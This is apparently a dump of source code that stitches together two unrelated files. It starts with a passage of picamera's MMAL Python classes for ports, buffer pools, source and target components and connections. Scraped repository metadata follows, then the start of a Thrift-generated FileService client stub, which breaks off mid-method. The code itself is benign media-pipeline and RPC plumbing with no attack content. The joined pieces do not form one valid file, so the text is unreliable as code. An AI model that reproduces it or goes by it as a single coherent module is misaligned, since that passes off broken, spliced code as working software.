        Returns the :class:`MMALPool` associated with the buffer, if any.
        """
        return self._pool
    @property
    def opaque_subformat(self):
        # Python ports never carry opaque formats
        return None
    def _get_buffer_count(self):
        return self._buffer_count
    def _set_buffer_count(self, value):
        if value < 1:
            raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
        self._buffer_count = int(value)
    buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
        The number of buffers allocated (or to be allocated) to the port. The
        default is 2 but more may be required in the case of long pipelines
        with replicated buffers.
        """)
    def _get_buffer_size(self):
        return self._buffer_size
    def _set_buffer_size(self, value):
        if value < 0:
            raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
        self._buffer_size = value
    buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
        The size of buffers allocated (or to be allocated) to the port. The
        size of buffers defaults to a value dictated by the port's format.
        """)
    def copy_from(self, source):
        """
        Copies the port's :attr:`format` from the *source*
        :class:`MMALControlPort`.
        """
        if isinstance(source, MMALPythonPort):
            mmal.mmal_format_copy(self._format, source._format)
        else:
            mmal.mmal_format_copy(self._format, source._port[0].format)
    def commit(self):
        """
        Commits the port's configuration and automatically updates the number
        and size of associated buffers. This is typically called after
        adjusting the port's format and/or associated settings (like width and
        height for video ports).
        """
        if self.format not in self.supported_formats:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
        self._buffer_count = 2
        video = self._format[0].es[0].video
        try:
            # For known unencoded formats, size buffers to hold a whole frame
            self._buffer_size = int(
                MMALPythonPort._FORMAT_BPP[str(self.format)]
                * video.width
                * video.height)
        except KeyError:
            # If it's an unknown / encoded format just leave the buffer size
            # alone and hope the owning component knows what to set
            pass
        # Give the owning component a chance to react (e.g. reconfigure
        # its output ports)
        self._owner()._commit_port(self)
    @property
    def enabled(self):
        """
        Returns a :class:`bool` indicating whether the port is currently
        enabled. Unlike other classes, this is a read-only property. Use
        :meth:`enable` and :meth:`disable` to modify the value.
        """
        return self._enabled
    def enable(self, callback=None):
        """
        Enable the port with the specified callback function (this must be
        ``None`` for connected ports, and a callable for disconnected ports).
        The callback function must accept two parameters which will be this
        :class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
        instance. Any return value will be ignored.
        """
        if self._connection is not None:
            if callback is not None:
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL,
                    'connected ports must be enabled without callback')
        else:
            if callback is None:
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL,
                    'unconnected ports must be enabled with callback')
        # Input ports and unconnected ports own their buffer pool; connected
        # output ports borrow buffers from the downstream input port instead
        if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
            self._pool = MMALPythonPortPool(self)
        self._callback = callback
        self._enabled = True
    def disable(self):
        """
        Disable the port.
        """
        self._enabled = False
        if self._pool is not None:
            # Release any unprocessed buffers from the owner's queue before
            # we destroy them all
            # NOTE(review): assumes _owner()._queue.get(False) returns a
            # falsy value (rather than raising) when empty — confirm the
            # owning component's queue type
            while True:
                buf = self._owner()._queue.get(False)
                if buf:
                    buf.release()
                else:
                    break
            self._pool.close()
            self._pool = None
        self._callback = None
    def get_buffer(self, block=True, timeout=None):
        """
        Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
        and *timeout* act as they do in the corresponding
        :meth:`MMALPool.get_buffer`.
        """
        if not self._enabled:
            raise PiCameraPortDisabled(
                'cannot get buffer from disabled port %s' % self.name)
        if self._pool is not None:
            # Unconnected port or input port case; retrieve buffer from the
            # allocated pool
            return self._pool.get_buffer(block, timeout)
        else:
            # Connected output port case; get a buffer from the target input
            # port (in this case the port is just a thin proxy for the
            # corresponding input port)
            assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
            return self._connection.target.get_buffer(block, timeout)
    def send_buffer(self, buf):
        """
        Send :class:`MMALBuffer` *buf* to the port.
        """
        # NOTE: The MMALPythonConnection callback must occur *before* the test
        # for the port being enabled; it's meant to be the connection making
        # the callback prior to the buffer getting to the port after all
        if (
                self.type == mmal.MMAL_PORT_TYPE_INPUT and
                self._connection._callback is not None):
            try:
                modified_buf = self._connection._callback(self._connection, buf)
            except:
                buf.release()
                raise
            else:
                if modified_buf is None:
                    buf.release()
                else:
                    buf = modified_buf
        if not self._enabled:
            raise PiCameraPortDisabled(
                'cannot send buffer to disabled port %s' % self.name)
        if self._callback is not None:
            try:
                # XXX Return value? If it's an input port we should ignore it,
                # but what about output ports?
                self._callback(self, buf)
            except:
                buf.release()
                raise
        if self._type == mmal.MMAL_PORT_TYPE_INPUT:
            # Input port case; queue the buffer for processing on the
            # owning component
            self._owner()._queue.put(buf)
        elif self._connection is None:
            # Unconnected output port case; release the buffer back to the
            # pool
            buf.release()
        else:
            # Connected output port case; forward the buffer to the
            # connected component's input port
            # XXX If it's a format-change event?
            self._connection.target.send_buffer(buf)
    @property
    def name(self):
        return '%s:%s:%d' % (self._owner().name, {
            mmal.MMAL_PORT_TYPE_OUTPUT:  'out',
            mmal.MMAL_PORT_TYPE_INPUT:   'in',
            mmal.MMAL_PORT_TYPE_CONTROL: 'control',
            mmal.MMAL_PORT_TYPE_CLOCK:   'clock',
            }[self.type], self._index)
    @property
    def type(self):
        """
        The type of the port. One of:
        * MMAL_PORT_TYPE_OUTPUT
        * MMAL_PORT_TYPE_INPUT
        * MMAL_PORT_TYPE_CONTROL
        * MMAL_PORT_TYPE_CLOCK
        """
        return self._type
    @property
    def capabilities(self):
        """
        The capabilities of the port. A bitfield of the following:
        * MMAL_PORT_CAPABILITY_PASSTHROUGH
        * MMAL_PORT_CAPABILITY_ALLOCATION
        * MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
        """
        return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
    @property
    def index(self):
        """
        Returns an integer indicating the port's position within its owning
        list (inputs, outputs, etc.)
        """
        return self._index
    @property
    def connection(self):
        """
        If this port is connected to another, this property holds the
        :class:`MMALConnection` or :class:`MMALPythonConnection` object which
        represents that connection. If this port is not connected, this
        property is ``None``.
        """
        return self._connection
    def connect(self, other, **options):
        """
        Connect this port to the *other* :class:`MMALPort` (or
        :class:`MMALPythonPort`). The type and configuration of the connection
        will be automatically selected.
        Various connection options can be specified as keyword arguments. These
        will be passed onto the :class:`MMALConnection` or
        :class:`MMALPythonConnection` constructor that is called (see those
        classes for an explanation of the available options).
        """
        # Always construct connections from the output end
        if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
            return other.connect(self, **options)
        if other.type != mmal.MMAL_PORT_TYPE_INPUT:
            raise PiCameraValueError(
                'A connection can only be established between an output and '
                'an input port')
        return MMALPythonConnection(self, other, **options)
    def disconnect(self):
        """
        Destroy the connection between this port and another port.
        """
        if self.connection is not None:
            self.connection.close()
class MMALPythonPortPool(MMALPool):
    """
    Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
    only used when a fake port is used without a corresponding
    :class:`MMALPythonConnection`.
    """
    __slots__ = ('_port',)
    def __init__(self, port):
        # Allocate a real MMAL pool sized to the port's current settings
        super(MMALPythonPortPool, self).__init__(
            mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
        self._port = port
    @property
    def port(self):
        # The MMALPythonPort this pool was created for
        return self._port
    def send_buffer(self, port=None, block=True, timeout=None):
        """
        Get a buffer from the pool and send it to *port* (or the port the pool
        is associated with by default). *block* and *timeout* act as they do in
        :meth:`MMALPool.get_buffer`.
        """
        if port is None:
            port = self._port
        super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
    def send_all_buffers(self, port=None, block=True, timeout=None):
        """
        Send all buffers from the pool to *port* (or the port the pool is
        associated with by default). *block* and *timeout* act as they do in
        :meth:`MMALPool.get_buffer`.
        """
        if port is None:
            port = self._port
        super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
    """
    Base class for Python-implemented MMAL components. This class provides the
    :meth:`_commit_port` method used by descendents to control their ports'
    behaviour, and the :attr:`enabled` property. However, it is unlikely that
    users will want to sub-class this directly. See
    :class:`MMALPythonComponent` for a more useful starting point.
    """
    __slots__ = ('_inputs', '_outputs', '_enabled',)
    def __init__(self):
        super(MMALPythonBaseComponent, self).__init__()
        self._enabled = False
        # Descendents are expected to populate these with MMALPythonPorts
        self._inputs = ()
        self._outputs = ()
        # TODO Control port?
    def close(self):
        """
        Close the component and release all its resources. After this is
        called, most methods will raise exceptions if called.
        """
        self.disable()
    @property
    def enabled(self):
        """
        Returns ``True`` if the component is currently enabled. Use
        :meth:`enable` and :meth:`disable` to control the component's state.
        """
        return self._enabled
    def enable(self):
        """
        Enable the component. When a component is enabled it will process data
        sent to its input port(s), sending the results to buffers on its output
        port(s). Components may be implicitly enabled by connections.
        """
        self._enabled = True
    def disable(self):
        """
        Disables the component.
        """
        self._enabled = False
    @property
    def control(self):
        """
        The :class:`MMALControlPort` control port of the component which can be
        used to configure most aspects of the component's behaviour.
        """
        # Python components currently have no control port
        return None
    @property
    def inputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the inputs
        of the component.
        """
        return self._inputs
    @property
    def outputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the outputs
        of the component.
        """
        return self._outputs
    def _commit_port(self, port):
        """
        Called by ports when their format is committed. Descendents may
        override this to reconfigure output ports when input ports are
        committed, or to raise errors if the new port configuration is
        unacceptable.
        .. warning::
            This method must *not* reconfigure input ports when called; however
            it can reconfigure *output* ports when input ports are committed.
        """
        pass
    def __repr__(self):
        # NOTE(review): a still-open component with zero outputs would be
        # reported as closed here — confirm all concrete subclasses have at
        # least one output, or whether _inputs should also be checked
        if self._outputs:
            return '<%s "%s": %d inputs %d outputs>' % (
                self.__class__.__name__, self.name,
                len(self.inputs), len(self.outputs))
        else:
            return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
    """
    Provides a source for other :class:`MMALComponent` instances. The
    specified *input* is read in chunks the size of the configured output
    buffer(s) until the input is exhausted. The :meth:`wait` method can be
    used to block until this occurs. If the output buffer is configured to
    use a full-frame unencoded format (like I420 or RGB), frame-end flags will
    be automatically generated by the source. When the input is exhausted an
    empty buffer with the End Of Stream (EOS) flag will be sent.
    The component provides all picamera's usual IO-handling characteristics; if
    *input* is a string, a file with that name will be opened as the input and
    closed implicitly when the component is closed. Otherwise, the input will
    not be closed implicitly (the component did not open it, so the assumption
    is that closing *input* is the caller's responsibility). If *input* is an
    object with a ``read`` method it is assumed to be a file-like object and is
    used as is. Otherwise, *input* is assumed to be a readable object
    supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
    stream).
    """
    __slots__ = ('_stream', '_opened', '_thread')
    def __init__(self, input):
        super(MMALPythonSource, self).__init__()
        # A source has no inputs and exactly one output port
        self._inputs = ()
        self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
        # _opened records whether *we* opened the stream (and must close it)
        self._stream, self._opened = open_stream(input, output=False)
        self._thread = None
    def close(self):
        super(MMALPythonSource, self).close()
        if self._outputs:
            self._outputs[0].close()
            self._outputs = ()
        if self._stream:
            close_stream(self._stream, self._opened)
            self._stream = None
    def enable(self):
        # Start a background daemon thread to pump the stream into buffers
        super(MMALPythonSource, self).enable()
        self._thread = Thread(target=self._send_run)
        self._thread.daemon = True
        self._thread.start()
    def disable(self):
        # Clearing enabled stops the pump loop; wait for it to finish
        super(MMALPythonSource, self).disable()
        if self._thread:
            self._thread.join()
            self._thread = None
    def wait(self, timeout=None):
        """
        Wait for the source to send all bytes from the specified input. If
        *timeout* is specified, it is the number of seconds to wait for
        completion. The method returns ``True`` if the source completed within
        the specified timeout and ``False`` otherwise.
        """
        if not self.enabled:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'cannot wait on disabled component')
        self._thread.join(timeout)
        return not self._thread.is_alive()
    def _send_run(self):
        # Background thread body: read the stream into output buffers until
        # EOF or the component is disabled.
        # Calculate the size of a frame if possible (i.e. when the output
        # format is an unencoded full frame format). If it's an unknown /
        # encoded format, we've no idea what the framesize is (this would
        # presumably require decoding the stream) so leave framesize as None.
        video = self._outputs[0]._format[0].es[0].video
        try:
            framesize = (
                MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
                * video.width
                * video.height)
        except KeyError:
            framesize = None
        frameleft = framesize
        while self.enabled:
            # Short timeout keeps the loop responsive to disable()
            buf = self._outputs[0].get_buffer(timeout=0.1)
            if buf:
                try:
                    if frameleft is None:
                        send = buf.size
                    else:
                        send = min(frameleft, buf.size)
                    with buf as data:
                        if send == buf.size:
                            try:
                                # readinto() is by far the fastest method of
                                # getting data into the buffer
                                buf.length = self._stream.readinto(data)
                            except AttributeError:
                                # if there's no readinto() method, fallback on
                                # read() and the data setter (memmove)
                                buf.data = self._stream.read(buf.size)
                        else:
                            buf.data = self._stream.read(send)
                    if frameleft is not None:
                        frameleft -= buf.length
                        if not frameleft:
                            buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
                            frameleft = framesize
                    if not buf.length:
                        # Zero-length read: end of input; flag EOS and stop
                        buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
                        break
                finally:
                    self._outputs[0].send_buffer(buf)
    @property
    def name(self):
        return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
    """
    Provides a Python-based MMAL component with a *name*, a single input and
    the specified number of *outputs* (default 1). The :meth:`connect` and
    :meth:`disconnect` methods can be used to establish or break a connection
    from the input port to an upstream component.
    Typically descendents will override the :meth:`_handle_frame` method to
    respond to buffers sent to the input port, and will set
    :attr:`MMALPythonPort.supported_formats` in the constructor to define the
    formats that the component will work with.
    """
    __slots__ = ('_name', '_thread', '_queue', '_error')
    def __init__(self, name='py.component', outputs=1):
        super(MMALPythonComponent, self).__init__()
        self._name = name
        # Worker thread (created on enable) which services self._queue.
        self._thread = None
        # Records an exception raised by the worker thread; re-raised by
        # disable() so callers see failures.
        self._error = None
        self._queue = MMALQueue.create()
        self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
        self._outputs = tuple(
            MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
            for n in range(outputs)
            )
    def close(self):
        # Tear down: break the upstream connection, close the input port,
        # disable all outputs, and destroy the buffer queue.
        super(MMALPythonComponent, self).close()
        self.disconnect()
        if self._inputs:
            self._inputs[0].close()
            self._inputs = ()
        for output in self._outputs:
            output.disable()
        self._outputs = ()
        self._queue.close()
        self._queue = None
    def connect(self, source, **options):
        """
        Connects the input port of this component to the specified *source*
        :class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
        convenience (primarily intended for command line experimentation; don't
        use this in scripts), *source* can be another component in which case
        the first unconnected output port will be selected as *source*.
        Keyword arguments will be passed along to the connection constructor.
        See :class:`MMALConnection` and :class:`MMALPythonConnection` for
        further information.
        """
        if isinstance(source, (MMALPort, MMALPythonPort)):
            return self.inputs[0].connect(source)
        else:
            # *source* is a component: pick its first free output port.
            for port in source.outputs:
                if not port.connection:
                    return self.inputs[0].connect(port, **options)
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
    def disconnect(self):
        """
        Destroy the connection between this component's input port and the
        upstream component.
        """
        self.inputs[0].disconnect()
    @property
    def connection(self):
        """
        The :class:`MMALConnection` or :class:`MMALPythonConnection` object
        linking this component to the upstream component.
        """
        return self.inputs[0].connection
    @property
    def name(self):
        return self._name
    def _commit_port(self, port):
        """
        Overridden to to copy the input port's configuration to the output
        port(s), and to ensure that the output port(s)' format(s) match
        the input port's format.
        """
        super(MMALPythonComponent, self)._commit_port(port)
        if port.type == mmal.MMAL_PORT_TYPE_INPUT:
            # Committing the input: mirror its config onto every output.
            for output in self.outputs:
                output.copy_from(port)
        elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
            # Committing an output: it must agree with the input's format.
            if port.format != self.inputs[0].format:
                raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
    def enable(self):
        # Start the worker thread (if not already running) which dispatches
        # queued buffers to the _handle_* methods.
        super(MMALPythonComponent, self).enable()
        if not self._thread:
            self._thread = Thread(target=self._thread_run)
            self._thread.daemon = True
            self._thread.start()
    def disable(self):
        # Stop the worker thread, then surface any exception it recorded.
        super(MMALPythonComponent, self).disable()
        if self._thread:
            self._thread.join()
            self._thread = None
            if self._error:
                raise self._error
    def _thread_run(self):
        # Worker loop: pull buffers off the queue and dispatch them by their
        # command code to the appropriate _handle_* method. A handler
        # returning True stops the component.
        try:
            while self._enabled:
                buf = self._queue.get(timeout=0.1)
                if buf:
                    try:
                        handler = {
                            0:                                 self._handle_frame,
                            mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
                            mmal.MMAL_EVENT_FORMAT_CHANGED:    self._handle_format_changed,
                            mmal.MMAL_EVENT_ERROR:             self._handle_error,
                            mmal.MMAL_EVENT_EOS:               self._handle_end_of_stream,
                            }[buf.command]
                        if handler(self.inputs[0], buf):
                            self._enabled = False
                    finally:
                        buf.release()
        except Exception as e:
            # Record the failure for disable() to re-raise on the caller's
            # thread, and stop processing.
            self._error = e
            self._enabled = False
    def _handle_frame(self, port, buf):
        """
        Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
        0).
        Typically, if the component has output ports, the method is expected to
        fetch a buffer from the output port(s), write data into them, and send
        them back to their respective ports.
        Return values are as for normal event handlers (``True`` when no more
        buffers are expected, ``False`` otherwise).
        """
        return False
    def _handle_format_changed(self, port, buf):
        """
        Handles format change events passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
        The default implementation re-configures the input port of the
        component and emits the event on all output ports for downstream
        processing. Override this method if you wish to do something else in
        response to format change events.
        The *port* parameter is the port into which the event arrived, and
        *buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
        structure). Use ``mmal_event_format_changed_get`` on the buffer's data
        to extract the event.
        """
        # NOTE: the with-block locks/maps the buffer while we decode the
        # event structure from it; *data* itself is not used directly.
        with buf as data:
            event = mmal.mmal_event_format_changed_get(buf._buf)
            if port.connection:
                # Handle format change on the source output port, if any. We
                # don't check the output port capabilities because it was the
                # port that emitted the format change in the first case so it'd
                # be odd if it didn't support them (or the format requested)!
                output = port.connection._source
                output.disable()
                if isinstance(output, MMALPythonPort):
                    mmal.mmal_format_copy(output._format, event[0].format)
                else:
                    mmal.mmal_format_copy(output._port[0].format, event[0].format)
                output.commit()
                # Prefer the recommended buffer count/size from the event,
                # falling back to the minimums when none is recommended.
                output.buffer_count = (
                    event[0].buffer_num_recommended
                    if event[0].buffer_num_recommended > 0 else
                    event[0].buffer_num_min)
                output.buffer_size = (
                    event[0].buffer_size_recommended
                    if event[0].buffer_size_recommended > 0 else
                    event[0].buffer_size_min)
                if isinstance(output, MMALPythonPort):
                    output.enable()
                else:
                    output.enable(port.connection._transfer)
        # Now deal with the format change on this input port (this is only
        # called from _thread_run so port must be an input port)
        try:
            if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL,
                    'port %s does not support event change' % self.name)
            mmal.mmal_format_copy(port._format, event[0].format)
            self._commit_port(port)
            port.pool.resize(
                event[0].buffer_num_recommended
                if event[0].buffer_num_recommended > 0 else
                event[0].buffer_num_min,
                event[0].buffer_size_recommended
                if event[0].buffer_size_recommended > 0 else
                event[0].buffer_size_min)
            port.buffer_count = len(port.pool)
            port.buffer_size = port.pool[0].size
        except:
            # If this port can't handle the format change, or if anything goes
            # wrong (like the owning component doesn't like the new format)
            # stop the pipeline (from here at least)
            # (Bare except is deliberate here: the exception is always
            # re-raised below after disabling the connection.)
            if port.connection:
                port.connection.disable()
            raise
        # Chain the format-change onward so everything downstream sees it.
        # NOTE: the callback isn't given the format-change because there's no
        # image data in it
        for output in self.outputs:
            out_buf = output.get_buffer()
            out_buf.copy_from(buf)
            output.send_buffer(out_buf)
        return False
    def _handle_parameter_changed(self, port, buf):
        """
        Handles parameter change events passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
        The default implementation does nothing but return ``False``
        (indicating that processing should continue). Override this in
        descendents to respond to parameter changes.
        The *port* parameter is the port into which the event arrived, and
        *buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
        structure).
        """
        return False
    def _handle_error(self, port, buf):
        """
        Handles error notifications passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
        The default implementation does nothing but return ``True`` (indicating
        that processing should halt). Override this in descendents to respond
        to error events.
        The *port* parameter is the port into which the event arrived.
        """
        return True
    def _handle_end_of_stream(self, port, buf):
        """
        Handles end-of-stream notifications passed to the component (where
        :attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
        The default implementation does nothing but return ``True`` (indicating
        that processing should halt). Override this in descendents to respond
        to the end of stream.
        The *port* parameter is the port into which the event arrived.
        """
        return True
class MMALPythonTarget(MMALPythonComponent):
    """
    Provides a simple component that writes all received buffers to the
    specified *output* until a frame with the *done* flag is seen (defaults to
    MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
    The component provides all picamera's usual IO-handling characteristics; if
    *output* is a string, a file with that name will be opened as the output
    and closed implicitly when the component is closed. Otherwise, the output
    will not be closed implicitly (the component did not open it, so the
    assumption is that closing *output* is the caller's responsibility). If
    *output* is an object with a ``write`` method it is assumed to be a
    file-like object and is used as is. Otherwise, *output* is assumed to be a
    writeable object supporting the buffer protocol (which is wrapped in a
    :class:`BufferIO` stream).
    """
    __slots__ = ('_opened', '_stream', '_done', '_event')
    def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
        # A pure sink: no output ports (outputs=0).
        super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
        # _opened records whether we opened the stream (and must close it).
        self._stream, self._opened = open_stream(output)
        # Buffer flag bitmask that marks the stream as complete.
        self._done = done
        # Set when a buffer carrying the *done* flag arrives; see wait().
        self._event = Event()
        # Accept all the formats picamera generally produces (user can add
        # other esoteric stuff if they need to)
        self.inputs[0].supported_formats = {
            mmal.MMAL_ENCODING_MJPEG,
            mmal.MMAL_ENCODING_H264,
            mmal.MMAL_ENCODING_JPEG,
            mmal.MMAL_ENCODING_GIF,
            mmal.MMAL_ENCODING_PNG,
            mmal.MMAL_ENCODING_BMP,
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            }
    def close(self):
        super(MMALPythonTarget, self).close()
        # Only closes the stream if we opened it (see _opened).
        close_stream(self._stream, self._opened)
    def enable(self):
        # Reset the completion event so wait() blocks for the next run.
        self._event.clear()
        super(MMALPythonTarget, self).enable()
    def wait(self, timeout=None):
        """
        Wait for the output to be "complete" as defined by the constructor's
        *done* parameter. If *timeout* is specified it is the number of seconds
        to wait for completion. The method returns ``True`` if the target
        completed within the specified timeout and ``False`` otherwise.
        """
        return self._event.wait(timeout)
    def _handle_frame(self, port, buf):
        # Write every buffer verbatim; stop (return True) once the *done*
        # flag is seen, after signalling any wait()ers.
        self._stream.write(buf.data)
        if buf.flags & self._done:
            self._event.set()
            return True
        return False
class MMALPythonConnection(MMALBaseConnection):
    """
    Represents a connection between an :class:`MMALPythonBaseComponent` and a
    :class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
    The constructor accepts arguments providing the *source* :class:`MMALPort`
    (or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
    :class:`MMALPythonPort`).
    The *formats* parameter specifies an iterable of formats (in preference
    order) that the connection may attempt when negotiating formats between
    the two ports. If this is ``None``, or an empty iterable, no negotiation
    will take place and the source port's format will simply be copied to the
    target port. Otherwise, the iterable will be worked through in order until
    a format acceptable to both ports is discovered.
    The *callback* parameter can optionally specify a callable which will be
    executed for each buffer that traverses the connection (providing an
    opportunity to manipulate or drop that buffer). If specified, it must be a
    callable which accepts two parameters: the :class:`MMALPythonConnection`
    object sending the data, and the :class:`MMALBuffer` object containing
    data. The callable may optionally manipulate the :class:`MMALBuffer` and
    return it to permit it to continue traversing the connection, or return
    ``None`` in which case the buffer will be released.
    .. data:: default_formats
        :annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
        Class attribute defining the default formats used to negotiate
        connections between Python and and MMAL components, in preference
        order. Note that OPAQUE is not present in contrast with the default
        formats in :class:`MMALConnection`.
    """
    __slots__ = ('_enabled', '_callback')
    default_formats = (
        mmal.MMAL_ENCODING_I420,
        mmal.MMAL_ENCODING_RGB24,
        mmal.MMAL_ENCODING_BGR24,
        mmal.MMAL_ENCODING_RGBA,
        mmal.MMAL_ENCODING_BGRA,
        )
    def __init__(
            self, source, target, formats=default_formats, callback=None):
        # A "python" connection only makes sense when at least one end is a
        # Python-implemented port; real MMAL<->MMAL links use MMALConnection.
        if not (
                isinstance(source, MMALPythonPort) or
                isinstance(target, MMALPythonPort)
                ):
            raise PiCameraValueError('use a real MMAL connection')
        super(MMALPythonConnection, self).__init__(source, target, formats)
        self._enabled = False
        # NOTE(review): _callback is stored here but consulted elsewhere
        # (presumably by the Python ports when transferring buffers).
        self._callback = callback
    def close(self):
        self.disable()
        super(MMALPythonConnection, self).close()
    @property
    def enabled(self):
        """
        Returns ``True`` if the connection is enabled. Use :meth:`enable`
        and :meth:`disable` to control the state of the connection.
        """
        return self._enabled
    def enable(self):
        """
        Enable the connection. When a connection is enabled, data is
        continually transferred from the output port of the source to the input
        port of the target component.
        """
        if not self._enabled:
            self._enabled = True
            if isinstance(self._target, MMALPythonPort):
                # Connected python input ports require no callback
                self._target.enable()
            else:
                # Connected MMAL input ports don't know they're connected so
                # provide a dummy callback
                self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
                self._target.enable(lambda port, buf: True)
            if isinstance(self._source, MMALPythonPort):
                # Connected python output ports are nothing more than thin
                # proxies for the target input port; no callback required
                self._source.enable()
            else:
                # Connected MMAL output ports are made to transfer their
                # data to the Python input port
                self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
                self._source.enable(self._transfer)
    def disable(self):
        """
        Disables the connection.
        """
        self._enabled = False
        self._source.disable()
        self._target.disable()
    def _transfer(self, port, buf):
        # Callback attached to a real MMAL source port: copy each arriving
        # buffer into a buffer from the Python target port. Retries with a
        # short timeout until a buffer is available or the connection is
        # disabled; a disabled port at either step simply drops the data.
        while self._enabled:
            try:
                dest = self._target.get_buffer(timeout=0.01)
            except PiCameraPortDisabled:
                dest = None
            if dest:
                dest.copy_from(buf)
                try:
                    self._target.send_buffer(dest)
                except PiCameraPortDisabled:
                    pass
                return False
        return False
    @property
    def name(self):
        return '%s/%s' % (self._source.name, self._target.name)
    def __repr__(self):
        try:
            return '<MMALPythonConnection "%s">' % self.name
        except AttributeError:
            # BUGFIX: this previously caught NameError, which attribute
            # access can never raise, making the "closed" branch
            # unreachable. After close() the source/target references are
            # cleared, so building the name fails with AttributeError.
            return '<MMALPythonConnection closed>'
| [
"[email protected]"
]
| |
63049adb954204a6d260ac373203abbc430dd063 | 67568ac53039fd633f9017bd368a13258191e1b2 | /thrift_example/file_transport/file/FileService.py | 429826b7eddda8fd50d339c35c87f6a40c1cd0ea | []
| no_license | starryrbs/rpc_shared | 22012bbb5e0916a178e088f1be58acedd589c13d | 6e4feb2929337ccb885ff629c13a0a6d3bc457d2 | refs/heads/master | 2022-12-11T04:27:24.176393 | 2020-09-02T16:01:37 | 2020-09-02T16:01:37 | 291,492,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 7,528 | py | #
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
# Registry of generated struct classes; fix_spec() is run over this at the
# bottom of the module to resolve recursive thrift_spec references.
all_structs = []
# NOTE: this module is generated by the Thrift compiler (see file header);
# do not hand-edit the code, only regenerate it from the .thrift IDL.
class Iface(object):
    # Abstract service interface for FileService; server-side handlers
    # implement this and are wrapped by Processor below.
    def uploadFile(self, filedata):
        """
        Parameters:
        - filedata
        """
        pass
class Client(Iface):
    # Generated RPC client stub: serialises calls onto the output protocol
    # and deserialises results from the input protocol.
    def __init__(self, iprot, oprot=None):
        # With a single protocol argument the same protocol is used for both
        # directions (the common case).
        self._iprot = self._oprot = iprot
        if oprot is not None:
            self._oprot = oprot
        self._seqid = 0
    def uploadFile(self, filedata):
        """
        Parameters:
        - filedata
        """
        # Synchronous call: send the request then block on the reply.
        self.send_uploadFile(filedata)
        return self.recv_uploadFile()
    def send_uploadFile(self, filedata):
        # Serialise the call message and its argument struct, then flush.
        self._oprot.writeMessageBegin('uploadFile', TMessageType.CALL, self._seqid)
        args = uploadFile_args()
        args.filedata = filedata
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()
    def recv_uploadFile(self):
        # Read the reply; a server-side exception arrives as an EXCEPTION
        # message and is re-raised here.
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
